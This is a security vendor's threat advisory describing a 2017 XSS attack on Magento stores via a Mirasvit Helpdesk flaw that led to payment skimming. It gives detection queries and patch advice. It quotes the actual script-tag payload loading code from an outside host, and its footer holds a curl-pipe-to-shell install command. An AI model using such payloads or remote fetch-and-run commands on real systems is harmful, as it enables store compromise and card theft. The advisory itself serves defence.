Sansec logo

Hackers breached Magento through helpdesk

Sansec

by Sansec Forensics Team

Published in Threat Research − December 28, 2017

Hackers breached Magento through helpdesk

Magento merchants have recently received messages like this:

Hey, I strongly recommend you to make a redesign! Please contact me if you need a good designer! -- [email protected]

Upon closer examination, the message contains a specially crafted sender that contains an XSS attack: an attempt to take control of the backend of a Magento store:

<script src="https://helpdeskjs.com/jquery.js"></script>@gmail.com

This exploits a bug in the popular Mirasvit Helpdesk extension. When a helpdesk agent opens the ticket, it will run the code in the background, in the browser of the agent. Then, malware is added to the footer of the Magento template, so that it is run by all store visitors. Ultimately, the malware intercepts payments data and send it offshore as the customer types it into the payment form.

Dangerous

This attack is particularly sophisticated, as it is able to bypass many security measures that a merchant might have taken. For example, IP restriction on the backend, strong passwords, 2-Factor-Authentication and using a VPN tunnel will not block this attack.

Have you been targeted?

Run this query on your database to find XSS attacks like these:

SELECT *
FROM `m_helpdesk_message`
WHERE `customer_email` LIKE '%script%'
OR `customer_name` LIKE '%<script%'
OR `body` LIKE '%<script%' \G

Search your access logs for modifications of templates through the backend:

$ grep system_config/save/section/design access.log

The Mirasvit Helpdesk flaw was discovered and published on September 21st, but - until now - hasn't been seen exploited in the wild.

Meanwhile, Mirasvit has released an update for its helpdesk software (v1.5.3). It is recommended to install this as soon as possible.

Other recommendations for store owners to block this type of attack:

  1. Monitor your store for modified head/footer template insertions
  2. Add a CSP header to disallow foreign Javascript execution altogether

Read more

Scan your store now
for malware & vulnerabilities

$ curl ecomscan.com | sh

eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.

Stay up to date with the latest eCommerce attacks

Sansec logo

experts in eCommerce security

Terms & Conditions
|
Privacy & Cookie Policy
Company Reg 77165187
|
Tax NL860920306B01